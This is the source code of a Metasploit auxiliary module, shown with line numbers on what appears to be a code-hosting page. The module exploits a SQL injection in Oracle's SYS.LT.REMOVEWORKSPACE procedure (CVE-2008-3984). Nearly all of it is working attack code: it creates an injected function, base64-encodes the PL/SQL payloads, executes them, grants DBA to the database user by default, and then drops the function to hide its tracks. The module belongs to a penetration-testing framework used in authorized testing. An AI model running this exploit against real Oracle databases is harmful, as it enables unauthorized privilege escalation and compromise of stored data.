Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::ORACLE
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name'           => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE',
12
      'Description'    => %q{
13
        This module exploits a sql injection flaw in the REMOVEWORKSPACE
14
        procedure of the PL/SQL package SYS.LT. Any user with execute
15
        privilege on the vulnerable package can exploit this vulnerability.
16
      },
17
      'Author'         => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
18
      'License'        => MSF_LICENSE,
19
      'References'     =>
20
        [
21
          [ 'CVE', '2008-3984' ],
22
          [ 'OSVDB', '49326']
23
        ],
24
      'DisclosureDate' => '2008-10-13'))
25

26
      register_options(
27
        [
28
          OptString.new('SQL', [ false, 'SQL to execte.',  "GRANT DBA to #{datastore['DBUSER']}"]),
29
        ])
30
  end
31

32
  def run
33
    return if not check_dependencies
34

35
    name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
36
    rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
37
    rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
38
    rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
39
    cruft = Rex::Text.rand_text_alpha_upper(1)
40

41
    function = "
42
      CREATE OR REPLACE FUNCTION #{cruft}
43
      RETURN VARCHAR2 AUTHID CURRENT_USER
44
      AS
45
      PRAGMA AUTONOMOUS_TRANSACTION;
46
      BEGIN
47
      EXECUTE IMMEDIATE '#{datastore['SQL']}';
48
      COMMIT;
49
      RETURN '#{cruft}';
50
      END;"
51

52
    package1 = %Q|
53
      BEGIN
54
        SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
55
      END;
56
      |
57

58
    package2 = %Q|
59
      BEGIN
60
        SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
61
      END;
62
      |
63

64
    uno  = Rex::Text.encode_base64(function)
65
    dos  = Rex::Text.encode_base64(package1)
66
    tres = Rex::Text.encode_base64(package2)
67

68
    sql = %Q|
69
      DECLARE
70
      #{rand1} VARCHAR2(32767);
71
      #{rand2} VARCHAR2(32767);
72
      #{rand3} VARCHAR2(32767);
73
      BEGIN
74
      #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));
75
      EXECUTE IMMEDIATE #{rand1};
76
      #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));
77
      EXECUTE IMMEDIATE #{rand2};
78
      #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));
79
      EXECUTE IMMEDIATE #{rand3};
80
      END;
81
      |
82

83
    clean = "DROP FUNCTION #{cruft}"
84

85
    # Try first, if it's good.. keep doing the dance.
86
    print_status("Attempting sql injection on SYS.LT.REMOVEWORKSPACE...")
87
    begin
88
      prepare_exec(sql)
89
    rescue => e
90
      return
91
    end
92

93
    print_status("Removing function '#{cruft}'...")
94
    prepare_exec(clean)
95

96
  end
97
end
98

99